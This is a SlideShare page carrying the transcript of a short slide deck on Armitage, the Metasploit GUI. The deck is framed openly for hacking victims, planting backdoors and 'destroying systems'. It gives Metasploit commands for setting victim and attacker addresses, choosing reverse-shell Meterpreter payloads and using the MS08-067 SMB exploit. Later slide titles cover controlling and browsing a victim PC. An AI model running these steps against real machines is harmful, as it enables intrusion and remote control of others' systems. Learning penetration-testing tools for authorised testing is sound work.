Your SlideShare is downloading. ×
Armitage : Art of Exploitation
Armitage : Art of Exploitation
Armitage : Art of Exploitation
Armitage : Art of Exploitation
Armitage : Art of Exploitation
Armitage : Art of Exploitation
Armitage : Art of Exploitation
Armitage : Art of Exploitation
Armitage : Art of Exploitation
Armitage : Art of Exploitation
Armitage : Art of Exploitation
Armitage : Art of Exploitation
Armitage : Art of Exploitation
Armitage : Art of Exploitation
Armitage : Art of Exploitation
Armitage : Art of Exploitation
Armitage : Art of Exploitation
Armitage : Art of Exploitation
Armitage : Art of Exploitation
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Armitage : Art of Exploitation

363

Published on

Armitage is a tool from Metasploit that penetration tester use for system or network penetration testing. Armitage is a GUI tool that supports a lot modules, exploits, payloads, auxiliaries for …

Armitage is a tool from Metasploit that penetration tester use for system or network penetration testing. Armitage is a GUI tool that supports a lot modules, exploits, payloads, auxiliaries for perform testing.

Published in: Internet, Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
363
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
30
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Art Of Exploitation www.kapilsoni.in
  • 2. www.kapilsoni.in Armitage :-  Armitage is GUI (Graphical User Interface) Tools For Metasploit That can be used for Penetration Testing of System and Network.  It is a Main Or Easily Accessible Tool Of Metasploit Framework.  Also we can use it For Backdoor, Remote Access, Trojan Creation, Hack System or Network, Destroy Systems or Networks or Much More.  In Armitage We Need Four Important Modules-  RHOST (Victim’s IP Address)  LHOST (Attacker’s IP Address)  Payload  Exploit
  • 3. www.kapilsoni.in Important Modules Of Armitage :- RHOST :- RHOST Stands for REMOTE HOST Means Victim. If We Want Hack or Remote Access of Victim’s Computer so We Necessary Need IP Address Of Victim’s Computer. Without IP Address Of Victim’s Computer We Can not hack or Take Remote Access of Computer. Setting RHOST By Command – >> SET RHOST 192.168.1.1 (Victim’s IP Address) LHOST :- LHOST Stands for LOCAL HOST Means Attacker. Many Exploits Demands of LHOST for Attacking Purpose or Remotely Access Purpose. Setting LHOST By Command – >> SET LHOST 192.168.1.2 (Attacker’s IP Address)
  • 4. www.kapilsoni.in Important Modules Of Armitage :- PAYLOAD :- Payload is a way to communicate Victim’s computer. Payload Provides a Platform or a Medium to Communicate with Victim’s Computer. There are many types of Payload According to Work or Uses. The Most Usable or Workable Payload is METERPRETER. Payload Gives You Options To Access Victim’s Computer. Setting Payloads With the Help Of Command – >> set payload windows/meterpreter/reverse_tcp >> set payload windows/vncinject/reverse_tcp >> set payload windows/shell/reverse_tcp There are Above 250 Payloads are Available In Armitage.
  • 5. www.kapilsoni.in Important Modules Of Armitage :- EXPLOITS :- Before Attack, You Must Choose Your Weapon. Armitage Make This Process Easy. For Example We Want to Hack Windows XP/2003, In Windows XP/2003 There are Many Types Of Vulnerability (Loophole), The Most Famous Or Attackable Vulnerability is MS_08_067. Now If We Want To Remote Access Of Victim’s Computer So We Can Enter On Victim’s PC With The Help Of Exploit. There Are Many Types Of Exploits Available According To Vulnerability Or Working. Setting Exploit With The Help Of Command – >> use windows/smb/ms08_067_netapi
  • 6. www.kapilsoni.in Graphical User Interface (GUI) Of Armitage :-
  • 7. www.kapilsoni.in Scanning Remote Host(Victim) In Armitage :-
  • 8. www.kapilsoni.in Finding Attacks For Victim PC In Armitage :-
  • 9. www.kapilsoni.in Triggering Vulnerability In Armitage :-
  • 10. www.kapilsoni.in After Attacking In Vulnerability :-
  • 11. www.kapilsoni.in Controlling Victim PC Through METERPRETER :-
  • 12. www.kapilsoni.in Browsing Files Victim PC Through METERPRETER :-
  • 13. www.kapilsoni.in Backdoor Through Armitage :-
  • 14. www.kapilsoni.in Backdoor Through Armitage :-
  • 15. www.kapilsoni.in Backdoor Through Armitage :-
  • 16. www.kapilsoni.in Backdoor Through Armitage :-
  • 17. www.kapilsoni.in Backdoor Through Armitage :-
  • 18. www.kapilsoni.in Backdoor Through Armitage :-
  • 19. www.kapilsoni.in Thank Y

×